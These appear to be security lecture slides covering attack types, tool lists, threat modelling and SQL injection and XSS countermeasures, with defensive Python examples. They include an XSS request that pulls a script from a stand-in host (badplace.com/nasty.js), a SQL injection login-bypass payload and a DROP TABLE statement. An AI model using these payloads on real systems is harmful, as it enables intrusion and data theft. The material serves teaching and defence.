security concepts
• According to the Internet Storm Center (http://isc.sans.org), a computer connected to the Internet has an average of 5 minutes before it falls under some form of attack.
AGENDA:
1. Network Security
2. Threats and Vulnerability
3. Application, Data and Host Security
4. Security Threat Modelling
5. Penetration Testing
NETWORK SECURITY PRINCIPLE
• Confidentiality: only sender, intended receiver should “understand” message contents
o sender encrypts message
o receiver decrypts message
• Authentication: sender, receiver want to confirm identity of each other
• Message Integrity: sender, receiver want to ensure message not altered (in transit, or afterwards) without detection
• Access and Availability: services must be accessible and available to users
FRIENDS AND ENEMIES: ALICE, BOB, TRUDY
• well-known in network security world
• Bob, Alice (lovers!) want to communicate “securely”
• Trudy (intruder) may intercept, delete, add messages
[Figure: Alice (secure sender) and Bob (secure receiver) exchange data and control messages over a channel; Trudy sits on the channel between them.]
Who might Bob, Alice be?
• … well, real-life Bobs and Alices!
• Web browser/server for electronic transactions (e.g., on-line purchases)
• on-line banking client/server
• DNS servers
• routers exchanging routing table updates
• other examples?
APPLICATION LAYER ATTACK – LAYER 7
• HTTP: Virus, Worms, SQL Injection, XSS
• Malware: Trojans, Backdoors
SNIFFER ATTACK
• Wireshark
• Cain and Abel
• TCPdump
• Kismet
• Dsniff
• Ettercap
• Paros Proxy, Burp proxy
DOS ATTACK TOOLS
• Jolt2
• Bubonic.c
• Land and LaTierra
• Targa
• Blast20
• Nemesy
• Panther2
• Crazy Pinger
• Some Trouble
• UDP Flood
• FSM
• FSMax
REFLECTION DOS
The attacking machines send out huge volumes of SYN packets with the IP source address spoofed to that of the target machine, so the replies go to the target.
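From the defender's side, a reflected SYN flood shows up as SYN-ACKs arriving from many different hosts that the target never sent a SYN to. The following detection logic is an added example (not part of the slides) run over a few constructed packet summaries; the address values and the threshold are assumptions of the example.

```python
from collections import defaultdict

# Constructed packet summaries (not from the slides): "src dst tcp_flags",
# where S = SYN and SA = SYN-ACK. 203.0.113.9 plays the target.
SAMPLE_PACKETS = [
    "198.51.100.5 203.0.113.9 SA",
    "198.51.100.6 203.0.113.9 SA",
    "198.51.100.7 203.0.113.9 SA",
    "198.51.100.8 203.0.113.9 SA",
    "203.0.113.9 192.0.2.10 S",    # a connection the target really opened
    "192.0.2.10 203.0.113.9 SA",   # the reply it legitimately expects
]


def unsolicited_synacks(packets):
    """Map each host to the set of peers that sent it a SYN-ACK
    without that host having sent a SYN to the peer first."""
    syn_sent = set()              # (client, server) pairs seen with a SYN
    hits = defaultdict(set)
    for line in packets:
        src, dst, flags = line.split()
        if flags == "S":
            syn_sent.add((src, dst))
        elif flags == "SA" and (dst, src) not in syn_sent:
            hits[dst].add(src)
    return dict(hits)


def reflection_victims(packets, threshold=3):
    """Hosts receiving unsolicited SYN-ACKs from at least `threshold` distinct peers."""
    return {host: len(peers)
            for host, peers in unsolicited_synacks(packets).items()
            if len(peers) >= threshold}


if __name__ == "__main__":
    print(reflection_victims(SAMPLE_PACKETS))   # {'203.0.113.9': 4}
```

The check keys on the three-way handshake: a legitimate SYN-ACK is always preceded by a SYN in the opposite direction, so the pair (203.0.113.9, 192.0.2.10) is ignored while the four unexplained SYN-ACKs are counted against the target.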
MANGLE – INVALID PACKET ATTACK
Tools to simulate Invalid Packet attack
• Nmap
• Nessus
Tools to handle this
• Iptables(linux)
• Checkpoint
• Netfilter
• Application need to handle this
BOTNET
• Exploit the system and turn it into a bot client
• Make the botnet server aware that it has joined the botnet
• Install an anti-antivirus module
• Listen to the botnet server for instructions
BUFFER OVERFLOW
A flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.
ROGUE DHCP SERVER
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create network problems
EAVESDROPPING
• Eavesdropping is secretly listening to the private conversation of others without their consent, as defined
by Black's Law Dictionary.
• Unencrypted open wifi network
• Tool: Firesheep
SOCIAL ENGINEERING ATTACK
• Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business—a bank, or credit card company—requesting "verification" of information and warning of some dire consequences if it is not provided.
• Phone phishing uses a rogue IVR system to recreate a legitimate-sounding copy of a bank or other institution's IVR system.
• Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim.
• Shoulder surfing involves observing an employee's private information over their shoulder. This type of attack is common in public places such as airports, airplanes or coffee shops.
WORM
ROOTKIT
A rootkit is a stealthy type of software, typically malicious, designed
to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a
computer.
MAC FLOODING - ARP
In a typical MAC flooding attack, the attacker feeds a switch many Ethernet frames, each containing a different source MAC address. The intention is to consume the limited memory set aside in the switch to store the MAC address table.
Tool: dsniff
DNS CACHE POISONING
DNS spoofing (or DNS cache poisoning) is a computer hacking attack whereby data is introduced into a Domain Name System (DNS) resolver's cache, causing the name server to return an incorrect IP address and diverting traffic to the attacker's computer (or any other computer).
URL ENCODING OR CANONICALIZATION
Canonicalization is when a resource can be represented in more than one manner.
Canonicalization of URLs occurs in a similar manner, where
http://domain.tld/user/foo.gif and
http://domain.tld/user/bar/../foo.gif
represent the same image file.
Validating input before it has been canonicalized can result in XSS and SQL injection attacks.
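The slide's two URLs only compare equal once the path has been decoded and its "../" segments resolved. The following is an added example (not from the slides) of a canonicalizer that does exactly that, refuses paths that climb above the document root, and produces the %XX form used in the encoding table at the end of this deck; the function names are the example's own.

```python
from urllib.parse import urlsplit, unquote


def canonical_path(url):
    """Return one canonical form of a URL's path: percent-decode once (as the
    web server would), then resolve '.' and '..' segment by segment.
    Raises ValueError if '..' would climb above the document root."""
    raw = unquote(urlsplit(url).path)
    segments = []
    for seg in raw.split("/"):
        if seg in ("", "."):
            continue                      # empty ('//') and '.' segments add nothing
        if seg == "..":
            if not segments:
                raise ValueError("path escapes the document root: " + raw)
            segments.pop()
        else:
            segments.append(seg)
    return "/" + "/".join(segments)


def same_resource(url_a, url_b):
    """True when both URLs name the same file once canonicalized; this is the
    comparison an access-control check must make instead of comparing raw strings."""
    return canonical_path(url_a) == canonical_path(url_b)


def escapes_root(url):
    """Convenience wrapper: does the URL try to leave the document root?"""
    try:
        canonical_path(url)
    except ValueError:
        return True
    return False


def percent_encode(ch):
    """%XX form of a single ASCII character, matching the encoding table."""
    code = ord(ch)
    if code > 0x7F:
        raise ValueError("only ASCII is handled here")
    return "%{:02X}".format(code)


if __name__ == "__main__":
    print(same_resource("http://domain.tld/user/foo.gif",
                        "http://domain.tld/user/bar/../foo.gif"))          # True
    print(escapes_root("http://domain.tld/../etc/passwd"))                # True
    print(percent_encode("<"))                                            # %3C
```

Decoding is done exactly once on purpose: the canonical form must be computed the same way the server computes it, and decoding in a loop would accept doubly-encoded input that the server itself would never decode.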
Cross-Site Scripting
Excerpt from an arbitrary web page, "getdata.php": echo $HTTP_GET_VARS["data"];
URL-encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution: <script src="http://www.badplace.com/nasty.js"></script>
MIME HEADER PARSING
• Several Win32 mass mailers send themselves via an email with a MIME-encoded malicious executable with a malformed header, and the executable will silently execute unbeknownst to the user.
• This occurs whenever Internet Explorer parses the mail and thus can happen when simply reading or previewing email. Thus, email worms can spread themselves without any user actually executing or detaching a file.
http://www.kb.cert.org/vuls/id/980499
REPLAY ATTACK
• A replay attack (also known as playback attack) is a form of network
attack in which a valid data transmission is maliciously or fraudulently
repeated or delayed.
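A replay attack succeeds against a protocol that checks integrity and authenticity but not freshness: the captured message still carries a valid tag. The following added example (not part of the slides) ties the earlier network security principles together: an HMAC over the message gives the receiver message integrity and sender authentication, and a per-message nonce the receiver remembers lets it reject a replayed copy. The key, nonce values and message format are the example's own assumptions.

```python
import hashlib
import hmac
import os

# Constructed shared key for the demo; a real deployment provisions it out of band.
SHARED_KEY = b"constructed-demo-key"
SEP = b"|"


def make_message(key, payload, nonce=None):
    """Sender side: tag nonce|payload with HMAC-SHA256 so the receiver can check
    integrity and origin (nobody without the key can produce a valid tag)."""
    if nonce is None:
        nonce = os.urandom(8).hex().encode()
    body = nonce + SEP + payload
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + SEP + tag


class Receiver:
    """Receiver side: verify the tag first, then refuse any nonce seen before."""

    def __init__(self, key):
        self.key = key
        self.seen_nonces = set()

    def accept(self, msg):
        body, _, tag = msg.rpartition(SEP)
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest().encode()
        # Constant-time comparison avoids leaking how many tag bytes matched.
        if not hmac.compare_digest(tag, expected):
            return ("bad-mac", None)
        nonce, _, payload = body.partition(SEP)
        if nonce in self.seen_nonces:
            return ("replay", None)
        self.seen_nonces.add(nonce)
        return ("ok", payload)


def demo_sequence(key=SHARED_KEY):
    """Deliver one message, replay it, then deliver a tampered copy."""
    receiver = Receiver(key)
    msg = make_message(key, b"transfer 100", nonce=b"n1")
    tampered = msg.replace(b"100", b"900", 1)   # alter the payload, keep the old tag
    return (receiver.accept(msg), receiver.accept(msg), receiver.accept(tampered))


if __name__ == "__main__":
    print(demo_sequence())
    # (('ok', b'transfer 100'), ('replay', None), ('bad-mac', None))
```

The order of the checks matters: the tag is verified before the nonce is recorded, so an attacker cannot fill the nonce set with forged messages, and a remembered-nonce set is only practical with a bound (a time window or a monotonic counter) in a long-running system.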
KEYLOGGER
• Keystroke logging, often referred to as keylogging or keyboard
capturing, is the action of recording (or logging) the keys struck on a
keyboard
• There are numerous keylogging methods, ranging from hardware-based to software-based.
TOP 10 VULNERABILITY SCANNER TOOLS
1. Nessus
2. OpenVAS
3. Core Impact
4. Nexpose
5. GFI LanGuard
6. QualysGuard
7. MBSA
8. Retina
9. Secunia
10. SAINT
VULNERABILITY RESEARCH WEBSITES
• http://www.kb.cert.org/vuls
• www.securitytracker.com
• www.microsoft.com/security
• www.securiteam.com
• www.packetstormsecurity.com
• www.hackerstorm.com
• www.hackerwatch.org
• www.securityfocus.com
• www.securitymagazine.com
VULNERABILITY SEARCH
• https://web.nvd.nist.gov/view/vuln/search
SOFTWARE EXPLOITATION
• Database
• Spyware – join Microsoft SpyNet using Windows Defender
• Rootkits – http://www.liutilities.com/products/wintaskspro/processlibrary
ATTACK
• Access attack – Dumpster diving, Eavesdropping, Snooping, Interception
• Modification and Repudiation attack
• DOS attack – ping of death, buffer overflow
• Botnets - http://www.microsoft.com/security/sir
COMMON ATTACKS
• Backdoor
• Spoofing
• Phishing
• Man-In-Middle attack
• Replay attack
• Password guessing
• Privilege escalation
APPLICATION AND DATA SECURITY
• Web Application
• OWASP Top 10 – https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
• Hacking tools: Instant Source, Wget, WebSleuth, BlackWidow, WindowBomb, Burp, cURL
SQL – TABLE NAME USERS
Name      Age   Email               Password   City
Ram       35    [email protected]   ram@123    Bangalore
Krishna   24    Krishna@nec.com     098kkk     Mysore
Parul     20    parul@gmail.com     Pp234      chennai
Select age from users where name='Parul';
Update users set email='[email protected]' where name='Ram'; -- this is a comment
INSERT into users values ('Puja', 30, '[email protected]', 'ppp123', 'Ooty');
DROP TABLE users;
e.g. PHP code
$result = mysql_query("select * from users where(name='$user' and password='$pass');");
Add username as Bina' OR 1=1);--
$result = mysql_query("select * from users where(name='Bina' OR 1=1);-- and password='junkvalue');");
SQL INJECTION COUNTERMEASURES
• Input validation
– Check that the input is in a valid format (whitelisting)
– Input sanitization
Blacklisting: reject ' ; --
Escaping problematic characters
• Use prepared statements
$db = new mysqli("localhost", "Sita", "ssttpass", "DB");
$statement = $db->prepare("select * from users where(name=? AND password=?);");
$statement->bind_param("ss", $user, $pass);
$statement->execute();
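The slides' PHP shows the injection and the prepared-statement fix side by side but cannot be run here. The following is an added example (not from the slides) that rebuilds the USERS table in an in-memory SQLite database and runs the slides' own payload, Bina' OR 1=1);--, against both a string-built query and a parameterised one; the table rows are constructed and the e-mail addresses are placeholders.

```python
import sqlite3

# In-memory copy of the slides' USERS table (constructed rows; the e-mail
# addresses are placeholders, and passwords are stored in clear only to
# mirror the slide; real systems store salted password hashes).
ROWS = [
    ("Ram", 35, "ram@example.com", "ram@123", "Bangalore"),
    ("Krishna", 24, "krishna@example.com", "098kkk", "Mysore"),
    ("Parul", 20, "parul@example.com", "Pp234", "chennai"),
]

INJECTED_USER = "Bina' OR 1=1);--"   # the payload from the slides


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(name TEXT, age INTEGER, email TEXT, "
               "password TEXT, city TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", ROWS)
    return db


def login_vulnerable(db, user, password):
    """Mirrors the slides' PHP: user input is pasted into the SQL text, so the
    quote in the payload closes the string and '--' comments out the password check."""
    sql = f"select * from users where(name='{user}' and password='{password}');"
    return db.execute(sql).fetchall()


def login_prepared(db, user, password):
    """Parameterised form: the '?' placeholders are bound as data and are never
    parsed as SQL, so the same payload is just a user name that does not exist."""
    sql = "select * from users where(name=? and password=?);"
    return db.execute(sql, (user, password)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print(len(login_vulnerable(db, INJECTED_USER, "junkvalue")))   # 3: every row
    print(login_prepared(db, INJECTED_USER, "junkvalue"))          # []
```

The vulnerable query becomes select * from users where(name='Bina' OR 1=1);-- and password='junkvalue'); which is true for every row, while the prepared statement compares the literal string Bina' OR 1=1);-- against the name column and matches nothing.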
XSS
• Stored XSS
– Attacker's site sends a malicious script to the genuine web server, which stores it
– Client accesses the genuine web server
– Browser runs the malicious script, which sends data to the attacker
• Reflected XSS attack
– Echoed input: the server reflects request data straight back into the page
• Prevention: input validation
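The getdata.php excerpt earlier in the deck is a reflected XSS: whatever arrives in the data parameter is echoed into the page. The following added example (not from the slides) decodes the slide's own attack URL to show what the server actually receives, contrasts the raw echo with HTML output encoding, and adds the whitelist input validation the slide recommends; the whitelist pattern is an assumption of the example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# The URL-encoded request shown on the Cross-Site Scripting slide.
ATTACK_URL = ("http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f"
              "www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e")


def get_param(url, name):
    """What the server sees after URL-decoding the query string."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(data):
    """Same behaviour as `echo $HTTP_GET_VARS["data"]`: raw input lands in the page."""
    return "<p>" + data + "</p>"


def render_escaped(data):
    """Output encoding: HTML metacharacters become entities, so the browser
    displays the text instead of executing it."""
    return "<p>" + html.escape(data, quote=True) + "</p>"


# Whitelist for this one parameter (assumed for the example): letters, digits,
# space and a few punctuation marks, at most 64 characters.
VALID_DATA = re.compile(r"[A-Za-z0-9 _.-]{1,64}")


def is_valid(data):
    """Input validation by whitelist: accept only what the feature needs."""
    return VALID_DATA.fullmatch(data) is not None


if __name__ == "__main__":
    payload = get_param(ATTACK_URL, "data")
    print(payload)                     # <script src="http://www.badplace.com/nasty.js"></script>
    print(is_valid(payload))           # False
    print(render_escaped(payload))     # &lt;script src=&quot;...&quot;&gt;&lt;/script&gt;
```

Validation and output encoding are complementary: the whitelist rejects the payload at the door, and encoding protects any page where data must be echoed even though it legitimately contains characters such as < or ".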
IMPORTANT KEYWORDS
• Threat Model
• Asset
• Threat
• Attack
• Attacker
• Impact
• Probability
• Mitigation
• Subject
IMPORTANT KEYWORDS CONTD…
• Object
• Action
• Intended Action
• Unintended Action
• Trust Boundary
• Subject/Object Matrix
• Actor/Action Matrix
• Data Flow Diagram
• Attack Tree
• IT Audit
THREAT MODELING
• Formal method to identify and enumerate risk
• Make informed risk decisions in regards to
– Actions
– Threats
– Mitigation against risk
WHAT CAN BE THREAT MODELED?
• Applications/ Software
• Systems
• Policies and Procedure
• Business Processes
• Anything….
WHEN TO DO THREAT MODELING
• Should be part of the SDL
• Should be an iterative process
• Whenever changes are made
RISK MANAGEMENT
• Risk Identification – incidents, bug reports, testing
• Risk Enumeration & Classification – impact, how and when it can occur, nature of risk
• Mitigation identification – cost-benefit analysis
• Mitigation testing – penetration testing, third-party design review, procedural review and management sign-off, legal review
THREAT MODEL PROCESS OVERVIEW
• Define Use Scenarios
• Define Security Assumptions
• Create/Update data flow diagram
• System Decomposition
• Identify Threats
• Determine Risks
• Plan Mitigations
• Iterate Threat Model
THREAT MODEL PROCESS METHODOLOGIES
• Microsoft STRIDE/DREAD
• NSA's InfoSec Assessment Methodology
• CERT’s Octave
STRIDE
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Escalation of Privilege
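STRIDE is applied per element of the data flow diagram: each kind of element (external entity, process, data store, data flow) is exposed to a characteristic subset of the six categories, and flows that cross a trust boundary are examined first. The following is an added example (not from the slides) that enumerates threats for a small constructed model of a web login; the per-element mapping follows the STRIDE-per-element heuristic from Microsoft's SDL threat modeling guidance and is an assumption of the example, as are the element names and trust zones.

```python
# STRIDE categories keyed by letter.
STRIDE = {
    "S": "Spoofing", "T": "Tampering", "R": "Repudiation",
    "I": "Information Disclosure", "D": "Denial of Service",
    "E": "Elevation of Privilege",
}

# STRIDE-per-element heuristic (assumed from Microsoft SDL guidance; the slides
# list STRIDE only). Data stores get R only when they hold logs or audit data.
PER_ELEMENT = {
    "external": "SR",
    "process": "STRIDE",
    "datastore": "TRID",
    "dataflow": "TID",
}

# Constructed model: name -> (element type, trust zone).
ELEMENTS = {
    "Browser": ("external", "internet"),
    "WebApp": ("process", "dmz"),
    "UsersDB": ("datastore", "internal"),
}
# Data flows between elements: (source, destination, label).
FLOWS = [
    ("Browser", "WebApp", "login form"),
    ("WebApp", "UsersDB", "SQL query"),
]


def flow_name(src, dst, label):
    return f"{src}->{dst} ({label})"


def enumerate_threats(elements, flows):
    """Return {element or flow name: [STRIDE category, ...]} for the whole model."""
    threats = {}
    for name, (kind, _zone) in elements.items():
        threats[name] = [STRIDE[c] for c in PER_ELEMENT[kind]]
    for src, dst, label in flows:
        threats[flow_name(src, dst, label)] = [STRIDE[c] for c in PER_ELEMENT["dataflow"]]
    return threats


def boundary_crossings(elements, flows):
    """Flows whose endpoints sit in different trust zones: these cross a trust
    boundary and are where threats are prioritised first."""
    return [flow_name(src, dst, label) for src, dst, label in flows
            if elements[src][1] != elements[dst][1]]


if __name__ == "__main__":
    for item, cats in enumerate_threats(ELEMENTS, FLOWS).items():
        print(item, "->", ", ".join(cats))
    print("crossing trust boundaries:", boundary_crossings(ELEMENTS, FLOWS))
```

Each entry is a candidate threat to be rated and either mitigated or accepted in the "Determine Risks" and "Plan Mitigations" steps of the process; the list is regenerated whenever the diagram changes, which is what makes the model iterative.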
IAM
• Designed by NSA
• Used by US Federal Government
• Assessment broken into 10 different areas
• Designed to assess the risk of automated information systems that support infrastructure
• Highly detailed and rigid process
http://csrc.nist.gov/publications/PubsSPs.html#800-30
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
OCTAVE
• Originates from Carnegie Mellon University's Software Engineering Institute in collaboration with CERT
• Focuses on organisational risk, not technical risk
• OCTAVE for large organisations and OCTAVE-S for small organisations
http://www.cert.org/octave/
MS THREAT MODELING TOOL
• Based on CIA methodology
• Comprehensive attack library
• Contains helpful advanced features
http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518
http://msdn.microsoft.com/en-us/library/ff649779.aspx
THREE PRE TEST PHASES
• Footprinting:
– Whois (internic.net), SmartWhois, nslookup
– Check company webpage, contact, location, numbers,
www.archive.org, whatismyip.com
– Employee blogs, Job boards
• Scanning
– Identifying active systems
– Discover open ports and access points
– Fingerprinting the OS
– Uncovering services on ports
Tools: nmap, ping, traceroute, netcat
THREE PRE TEST PHASES CONTD….
• Enumerating
– Identify user accounts
– discover NetBIOS name with Nbtscan
– SNMPutil for SNMP
– Windows DNS query
– Establishing Null session
Tools:
Vulnerability scanners: Retina, SAINT
Password crackers: Brutus
IMPORTANT URLS
• Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to-escalate-privileges.html
• Sniffer Tools : http://sectools.org/tag/sniffers/
DEFENDING REPUTATION ON INTERNET
• http://www.defendmyname.com
• http://www.reputationdefender.com
• http://www.visibletechnologies.com
URL encoding of ASCII characters (character, %hex code):
Char  Code    Char             Code    Char  Code
a     %61     backspace        %08     :     %3A
b     %62     tab              %09     ;     %3B
c     %63     linefeed         %0A     <     %3C
d     %64     carriage return  %0D     =     %3D
e     %65     space            %20     >     %3E
f     %66     !                %21     ?     %3F
g     %67     "                %22     @     %40
h     %68     #                %23     A     %41
i     %69     $                %24     B     %42
j     %6A     %                %25     C     %43
k     %6B     &                %26     D     %44
l     %6C     '                %27     E     %45
m     %6D     (                %28     F     %46
n     %6E     )                %29     G     %47
o     %6F     *                %2A     H     %48
p     %70     +                %2B     I     %49
q     %71     ,                %2C     J     %4A
r     %72     -                %2D     K     %4B
s     %73     .                %2E     L     %4C
t     %74     /                %2F     M     %4D
u     %75     0                %30     N     %4E
v     %76     1                %31     O     %4F
w     %77     2                %32     P     %50
x     %78     3                %33     Q     %51
y     %79     4                %34     R     %52
z     %7A     5                %35     S     %53
{     %7B     6                %36     T     %54
|     %7C     7                %37     U     %55
}     %7D     8                %38     V     %56
~     %7E     9                %39     W     %57
                                       X     %58
                                       Y     %59
                                       Z     %5A
                                       [     %5B
                                       \     %5C
                                       ]     %5D
                                       ^     %5E
                                       _     %5F
                                       `     %60